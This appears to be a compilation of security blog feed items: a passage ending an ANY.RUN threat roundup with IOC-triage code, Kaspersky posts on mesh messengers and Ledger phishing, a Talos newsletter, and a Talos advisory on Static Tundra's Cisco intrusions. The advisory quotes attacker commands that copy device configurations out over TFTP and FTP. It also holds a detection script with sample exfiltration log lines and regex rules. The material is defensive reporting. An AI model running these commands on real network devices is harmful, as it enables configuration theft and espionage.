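        if tld == "com" and len(sld) == 2:
            return "compound_cc_com"  # e.g. name.it.com
        if sld == "com" and len(tld) == 2 and tld not in PUBLIC_COM_CC:
            return "compound_com_cc"  # e.g. name.com.de
    return "ru_domain" if labels[-1] == "ru" else None


def triage(raw_iocs):
    """Group refanged IOCs by kind and record hosts that match the infrastructure pattern."""
    out = {"ip": [], "url": [], "email": [], "domain": [], "unknown": [], "patterns": {}}
    for raw in raw_iocs:
        kind, value = classify(raw)
        out[kind].append(value)
        host = None
        if kind == "domain":
            host = value.lstrip("*.")
        elif kind == "url":
            host = urlsplit(value).hostname
        elif kind == "email":
            host = value.split("@", 1)[1].lower()
        if host:
            pattern = infrastructure_pattern(host)
            if pattern:
                out["patterns"][host] = pattern
    return out


if __name__ == "__main__":
    result = triage(RAW_IOCS)
    for kind in ("ip", "domain", "url", "email"):
        print(kind, result[kind])
    print("patterns", result["patterns"])
```

Note that `telephony.nexttradeitaly.com` from the URL list is not flagged: it sits under a plain `.com`, unlike the `nexttradeitaly.it.com` domain entry. Keeping the refanged host alongside the pattern tag is what lets the compound-domain rule feed a SIEM lookup without anyone re-typing indicators.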

View July’s top threats analysis to spot recurring tactics and compare how attacker trends evolved month to month. 

Equip Your SOC to Outpace Threat Actors 

This month’s attacks show how far phishing kits and stealers have evolved, from multi-stage deception chains to ClickFix flows with steganography. Stopping them takes more than static IOCs; it demands behavioral visibility and live threat intelligence.

With ANY.RUN’s Interactive Sandbox, SOC teams can replicate real user actions, expose hidden payloads, and cut investigation time from hours to minutes. Paired with Threat Intelligence Lookup, analysts can track infrastructure, enrich detection rules, and feed high-fidelity data into SIEMs, SOARs, and XDR workflows. 

In practice, this delivers faster triage, reduced MTTR, and stronger defenses against evolving threats, all with intelligence that scales across the business. 

About ANY.RUN 

ANY.RUN helps more than 15,000 organizations worldwide, from banking and healthcare to telecom, retail, and technology, build stronger cybersecurity operations and respond to threats with confidence. 

Built for speed and clarity, our solutions combine interactive malware analysis with real-time threat intelligence, giving SOC teams the visibility they need to cut investigation time and stop attacks earlier. 

Integrate ANY.RUN’s Threat Intelligence suite into your workflows to reduce investigation time, prevent costly breaches, and strengthen long-term resilience.  


The post Major Cyber Attacks in August 2025: 7-Stage Tycoon2FA Phishing, New ClickFix Campaign, and Salty2FA appeared first on ANY.RUN’s Cybersecurity Blog.

Messaging apps that work without an internet connection or cell service | Kaspersky official blog

Constant access to the internet and cell service is taken as much for granted these days as electricity, and it’s sometimes hard to imagine how we ever lived without them. But what if you find yourself in a situation with no mobile internet or cell signal, but you need to stay in touch with friends nearby? For example, your group gets separated on a plane and you’re seated in different sections, but you were all set to discuss your travel plans during the flight. Or you’re at a music festival where the internet is wobbly and it’s too loud to talk, but you still need to coordinate when to head to the main stage.

This is where decentralized p2p (peer-to-peer), or mesh messaging apps can come in handy. These apps allow you to connect multiple devices into a single “mesh” network via Bluetooth or Wi-Fi Direct.

In the 2010s, with the emergence of Wi-Fi Direct, apps like these made a lot of noise, but never really took off — it wasn’t clear what they were for or where you’d even use them. They were an odd substitute for walkie-talkies, but with a shorter range and higher power consumption, so they never became popular with smartphone users. Still, these types of messaging apps are alive and well today, with developers continuing to support them, and even building new ones.

That’s because they serve a key purpose: allowing folks to stay connected during natural disasters, coordinate search party efforts, or simply communicate with neighbors at home or at the summer cottage when there’s no Wi-Fi or cell signal. For these and other similar situations, decentralized messaging apps that don’t require an internet connection are a good, if not perfect, solution.

So, if those walkie-talkies you ordered don’t arrive before your planned hike, mesh messaging apps can step in as a backup.

The term “decentralized” is also often used to describe blockchain messaging apps like Status or Brave Messenger. However, we won’t be talking about them today since they require a stable internet connection to work.

How p2p messaging apps work

These apps work on a decentralized mesh network, where each device serves as both a client and a relay. A distributed network is built up from many client devices, and each member can act as a bridge to pass messages along.

Imagine your smartphone turning into a mini walkie-talkie that can send messages to other nearby devices that have the right app installed. If you want to send a message, it’ll hop from one user’s smartphone to another’s until it reaches the intended recipient. The devices it passes through can’t read the message, as it’s encrypted for the recipient rather than for the relaying nodes.

Devices connect directly with each other via either Bluetooth or Wi-Fi Direct.

Which mesh messaging apps are worth trying?

BitChat. This is the latest decentralized messaging app based on Bluetooth Low Energy (BLE), launched in July 2025 by ex-Twitter (now X) co-founder Jack Dorsey. The app is positioned as a modern, encrypted version of the IRC chats from the late 1990s — and it looks like one too.

It claims to be completely decentralized with no servers and to use end-to-end encryption; messages are broken into 500-byte fragments for smoother transmission. The app requires no sign-up, email, or phone number.

However, security researchers have already found critical vulnerabilities in BitChat, and even call it a victim of “vibe coding” — an AI-driven development technique that omits a proper security audit. Currently, AI-powered tools still struggle with “secure by design”, meaning they have difficulty integrating fundamental security principles at the app’s design phase. Jack Dorsey promises to fix the bugs in upcoming updates.

You can install the messenger from both the App Store and Google Play. The source code is available on GitHub, and you can follow the official releases and updates on Jack Dorsey’s X account.

Bridgefy. This has over 12 million users, which is a lot for a mesh messaging app — the more users there are, the more likely you’ll be able to connect.

Bridgefy also uses BLE, works on both iOS and Android, supports end-to-end encryption, and has two modes: private messaging and public broadcasting. On the downside, the free version is plagued with obtrusive ads, and performance can be patchy.

Briar. This is an open-source, end-to-end encrypted messaging app whose code has passed an independent security audit by Germany’s Cure53.

In addition to working via Bluetooth and Wi-Fi Direct, it can also connect over the internet through the Tor network, which makes it a more versatile tool.

While Briar provides the highest level of privacy and security, there are trade-offs. First, you can only add a contact in person by scanning a QR code or by using special links shared through other channels. Second, forget about voice messages, files, or GIFs — Briar only supports text messaging.

Finally, Briar is only available for Android.

White Mouse. A relatively new project, White Mouse is a chat app with disappearing messages. It’s currently only available for Android, but the developers have promised versions for iOS, macOS, and Windows. It doesn’t require a phone number to sign up, provides end-to-end encryption, doesn’t store messages anywhere, and can automatically delete them. To increase privacy, White Mouse doesn’t allow users to forward messages, take screenshots, or record the screen. It also creates special backgrounds with watermarks to prevent chats from being photographed. It can work both over the internet and directly between nearby devices.

What to bear in mind when using mesh messaging apps

  • They aren’t a replacement for centralized messaging apps. Even in an urban environment, sending a message to a friend in the next building over can be a challenge.
  • The range is limited by Bluetooth/Wi-Fi power. At least one other user with the same messaging app must be within 100 meters of you in an open area — even closer if there’s no direct line of sight.
  • Performance depends on the number of users — the more people using the app, the further a message can travel. A mesh network with enough users can stretch for miles. This means you may have to play the diplomat and convince all your friends to switch from their more user-friendly chat apps.
  • Your battery will drain faster with active Bluetooth / Wi-Fi Direct use, so stock up on power banks.
  • Not all mesh messaging apps use reliable encryption. Claiming to have it and actually having it aren’t the same thing, so only trust independent researchers and their verification.
  • Favor open-source projects, as these allow a wide range of researchers to verify app security.
  • Some apps may have vulnerabilities, as the example with BitChat showed. Therefore, it’s not recommended to discuss anything confidential in these apps. And use Kaspersky Premium on your devices to prevent your data from being compromised and to defend against malicious actors.

General tips for using mesh messaging apps

Mesh messaging apps aren’t a replacement for regular messaging apps for daily communication. They’re a tool for special circumstances and should be treated like a first-aid kit, a fire extinguisher, or a life jacket — have one on hand and be glad you normally don’t have to use it.

  • Install and set up the app in advance — at the critical moment, you may not have time to figure things out or be able to install the app.
  • Make sure your contacts, neighbors, or travel buddies have the same app installed.
  • Install several different mesh messaging apps if your lifestyle involves frequent travel or being in places with potential connectivity issues — you never know which one will find a “partner” nearby.
  • Before an important event, test the app under conditions similar to what you expect to encounter.
  • Have a backup communication plan, such as actual walkie-talkies suited for the specific terrain.

What else to read about messaging app security?

Kaspersky official blog – Read More

“What happens online stays online” and other cyberbullying myths, debunked

Separating truth from fiction is the first step towards making better parenting decisions. Let’s puncture some of the most common misconceptions about online harassment.

WeLiveSecurity – Read More

Cherry pie, Douglas firs and the last trip of the summer


(Welcome to this week’s edition of the Threat Source newsletter.) 


Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

  1. Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
  2. Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
  3. Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
  4. Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
  5. Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay — don’t forget to log out of your accounts. 
  6. Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
  7. Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
  8. Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

The one big thing 

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

Why do I care? 

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

So now what? 

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

Top security headlines of the week 

Workday Data Breach Bears Signs of Widespread Salesforce Hack 
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek)

Novel 5G Attack Bypasses Need for Malicious Base Station 
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek)

Internet-wide Vulnerability Enables Giant DDoS Attacks 
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called “MadeYouReset,” and it’s raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading)

Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web 
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News)

XenoRAT malware campaign hits multiple embassies in South Korea  
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

Can’t get enough Talos? 

The art of controlling information 
JJ Cummings leads Talos’ Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

Ransomware incidents in Japan during the first half of 2025 
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst 
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

Upcoming events where you can find Talos 

  • BlueTeamCon (Sept. 4 – 7) Chicago, IL 
  • LABScon (Sept. 17 – 20) Scottsdale, AZ 
  • VB2025 (Sept. 24 – 26) Berlin, Germany 

Most prevalent malware files from Talos telemetry over the past week

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
MD5: 71fea034b422e4a17ebb06022532fdde    
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe    
Claimed Product: N/A    
Detection Name: Coinminer:MBT.26mw.in14.Talos  

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610
MD5: 85bbddc502f7b10871621fd460243fbc   
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details  
Typical Filename: N/A  
Claimed Product: Self-extracting archive  
Detection Name: Win.Worm.Bitmin-9847045-0 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
Typical Filename: IMG001.exe  
Detection Name: Simple_Custom_Detection    

SHA256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa
MD5: df11b3105df8d7c70e7b501e210e3cc3  
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details  
Typical Filename: DOC001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

Cisco Talos Blog – Read More

A phishing scam targeting Ledger users | Kaspersky official blog

Until recently, scammers have mainly focused on targeting cryptocurrency wallets owned by individual users. However, it appears that businesses are increasingly using cryptocurrencies, so attackers are now trying to get their hands on corporate wallets as well. You don’t have to look far for examples. The recently studied Efimer malware, which was distributed to organizations, is capable of swapping cryptocurrency wallet addresses in the clipboard. So we weren’t really surprised to observe cryptocurrency phishing campaigns directed at both individual and corporate users. What did come as a surprise, though, was the sophistication of the cover story and of the scam as a whole.

The phishing scheme

This particular scheme targets users of Ledger hardware cryptocurrency wallets — specifically the Nano X and Nano S Plus. The scammers send out a phishing email with a lengthy apology. The email claims that, due to a technical flaw, segments of the users’ private keys were transmitted to a Ledger server; the data was well-protected and encrypted, but the “company’s team” had discovered a highly complex data breach. The attackers’ fake story goes on to state that they’d exfiltrated fragments of keys, and then used extremely advanced methods to decrypt and reconstruct some of them — “leading to the theft of crypto assets”. Users are then advised to prevent their crypto wallets from being compromised through the same vulnerability, with the attackers recommending immediately updating the firmware of their device.

Phishing prompt to update the firmware


It’s a compelling story, to be sure. But if you apply some critical thinking, a few inconsistencies crop up. For example, it’s unclear how a fragment of a key could be used to reconstruct the whole thing. It’s also completely baffling what these “advanced decryption methods” are, and how Ledger representatives supposedly know about them.

The email itself is crafted extremely carefully: there’s almost nothing to nitpick. It wasn’t even sent with the help of standard scammer tools; instead, the attackers used a legitimate mailing service, SendGrid. This means the emails have a good reputation and often bypass anti-phishing filters. The only red flags are the sender’s domain and the domain of the website users are told to visit for the firmware update. Needless to say, neither has any connection to Ledger.

The scammers’ website

The website is also very clean and professionally designed — if you ignore the completely irrelevant domain it’s hosted on, that is. It’s possible the site serves multiple scams, as there’s no mention of a firmware update, and it lists far more devices than the email does. The website even has a functional support chat! While that’s most likely a chatbot, it does respond to questions and gives seemingly helpful advice. The whole point of the site is to get you to enter your seed phrase after you select your device.

The interface for entering seed phrases


A seed phrase is a randomly generated sequence of words used for recovering access to a cryptocurrency wallet. And as you may have guessed, it should not be entered, as anyone who knows it can gain full access to your crypto assets.

On a separate note, when you search for similar sites on Google, you’ll find a surprising number of similar fake pages. This type of scam is clearly quite popular.

How to stay out of harm’s way?

Whether you manage your crypto assets on your own devices or simply use regular online banking apps, it’s crucial to stay informed about the latest tactics attackers are using. For company employees, we recommend specialized training tools to boost their awareness of modern cyberthreats. One effective way to do this is by using the Kaspersky Automated Security Awareness Platform. For home users, our blog is a great resource for learning how to spot phishing scams.

Additionally, we recommend installing a robust security solution on both the personal and work devices you use for financial transactions. These solutions can both block access to phishing sites and prevent data breaches.

Kaspersky official blog – Read More

Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices

  • Static Tundra is a Russian state-sponsored cyber espionage group linked to the FSB’s Center 16 unit that has been operating for over a decade, specializing in compromising network devices for long-term intelligence gathering operations.
  • The group actively exploits a seven-year-old vulnerability (CVE-2018-0171) in the Smart Install feature of Cisco IOS software, which was patched when the vulnerability was published, targeting unpatched and end-of-life network devices to steal configuration data and establish persistent access.
  • Primary targets include organizations in telecommunications, higher education and manufacturing sectors across North America, Asia, Africa and Europe, with victims selected based on their strategic interest to the Russian government.
  • Static Tundra employs sophisticated persistence techniques including the historic SYNful Knock firmware implant (first reported in 2015) and bespoke SNMP tooling to maintain undetected access for multiple years.
  • The threat extends beyond Russia’s operations — other state-sponsored actors are likely conducting similar network device compromise campaigns, making comprehensive patching and security hardening critical for all organizations.
  • Threat actors will continue to abuse devices which remain unpatched and have Smart Install enabled.
  • Customers are urged to apply the patch for CVE-2018-0171 or to disable Smart Install as indicated in the advisory if patching is not an option. Customer support is available if needed by initiating a TAC request.


Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.

Threat actor and campaign overview

Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.

Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group’s advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.

Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.

For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.

Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.

While this blog focuses on Static Tundra’s ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.

Targeting and victimology

Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.

One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.

Tactics, techniques and procedures (TTPs)

We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.

Initial access

Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.

Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned advanced persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. Unpatched devices with Smart Install enabled will continue to be vulnerable to these and other attacks unless and until customers take action.

Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.

After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.

Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of “anonymous” and “public” with read-write permissions.

Execution

Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.

Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.

Persistence

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.

Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.

Defense evasion

Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.

Discovery

Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.

Collection

One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.

Exfiltration

Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.

Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:

do show running-config | redirect tftp://:/conf_bckp
copy running-config ftp://user:pass@/output.txt

Detection

Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:

  • Conduct comprehensive configuration management (including auditing), in line with best practices.
  • Conduct comprehensive authentication, authorization and command issuance monitoring.
  • Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
  • Monitor your environment for unusual changes in behavior or configuration.
  • Profile (fingerprint via NetFlow and port scanning) network devices for a shift in their exposed surface, including new ports opening or closing and traffic to or from the device itself (not traffic traversing it).
  • Where possible, develop NetFlow visibility to identify unusual volumetric changes.
  • Look for non-empty or unusually large .bash_history files.

Additional identification and detection can be performed using the Cisco forensic guides.
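As an added illustration of the monitoring steps above (example code, not from the Talos report), the script below runs a few rules derived from the TTPs described in this report over constructed command-accounting records and also reports per-device gaps in logged activity. The record format, device names and the 198.51.100.7 address are all made up for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed command-accounting records (not from the Talos report), one per
# line: "<ISO timestamp> <device> <user> <command>".
SAMPLE_LOG = """\
2025-01-15T08:00:05Z edge-rtr1 netops show ip interface brief
2025-01-15T08:01:10Z edge-rtr1 netops show cdp neighbors detail
2025-01-15T08:02:44Z edge-rtr1 netops interface Tunnel100
2025-01-15T08:02:55Z edge-rtr1 netops tunnel destination 198.51.100.7
2025-01-15T08:05:00Z edge-rtr1 netops do show running-config | redirect tftp://198.51.100.7/conf_bckp
2025-01-15T20:30:00Z edge-rtr1 netops show clock
2025-01-15T08:00:00Z core-sw1 netops show version
2025-01-15T09:30:00Z core-sw1 netops copy running-config ftp://user:pass@198.51.100.7/output.txt
"""

# Rules derived from the TTPs above: config copied/redirected to a remote TFTP/FTP/RCP target, GRE tunnel set-up, CDP neighbour recon.
RULES = [
    ("config_copy_to_remote",
     re.compile(r"(copy\s+(running|startup)-config\s+|\|\s*redirect\s+)(tftp|ftp|rcp)://", re.I)),
    ("gre_tunnel_setup",
     re.compile(r"^(interface\s+Tunnel\d+|tunnel\s+(mode\s+gre|source|destination)\b)", re.I)),
    ("cdp_neighbor_recon", re.compile(r"^show\s+cdp\s+neighbors?\b", re.I)),
]

def parse(log_text):
    """Return (timestamp, device, user, command) tuples; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) == 4:
            try:
                ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
            except ValueError:
                continue
            events.append((ts, parts[1], parts[2], parts[3]))
    return events

def match_commands(events):
    """Return (device, user, rule_name, command) for every command that matches a rule."""
    return [(dev, user, name, cmd)
            for _, dev, user, cmd in events
            for name, rx in RULES if rx.search(cmd)]

def find_logging_gaps(events, threshold=timedelta(hours=6)):
    """Per device, report silent periods longer than threshold (the 'gap in logged activity' above)."""
    by_device = {}
    for ts, dev, _, _ in events:
        by_device.setdefault(dev, []).append(ts)
    gaps = []
    for dev, stamps in by_device.items():
        stamps.sort()
        gaps += [(dev, a, b) for a, b in zip(stamps, stamps[1:]) if b - a > threshold]
    return gaps
```

On the sample data the rules fire five times (two configuration copies to a remote host, two GRE tunnel lines and one CDP neighbour listing) and edge-rtr1 shows a twelve-hour silence that would warrant a look at its logging configuration.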

Preventative measures

The following strong recommendations apply to entities in all sectors.

  • Cisco-specific measures
    • Apply the patch for CVE-2018-0171.
      • Disable Smart Install as indicated in the advisory if patching is not an option.
    • Leverage Cisco Hardening Guides when configuring devices.
    • Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
    • Disable Cisco’s Smart Install service using “no vstack” for any device where application of the available patch for CVE-2018-0171 is infeasible, and develop end-of-life management plans for technology too old to patch.
    • Utilize Type 8 passwords for local account credential configuration.
    • Utilize Type 6 for TACACS+ key configuration.
  • General measures
    • Rigorously adhere to security best practices, including updating, access controls, user education and network segmentation.
    • Stay up to date on security advisories from the U.S. government and industry and consider suggested configuration changes to mitigate described issues.
    • Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of-life hardware and software.
    • Select complex passwords and community strings and avoid default credentials.
    • Use multi-factor authentication (MFA).
    • Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
    • Lock down and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
    • Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
    • Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP, HTTPS).
    • Disable all non-encrypted web management capabilities.
    • Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
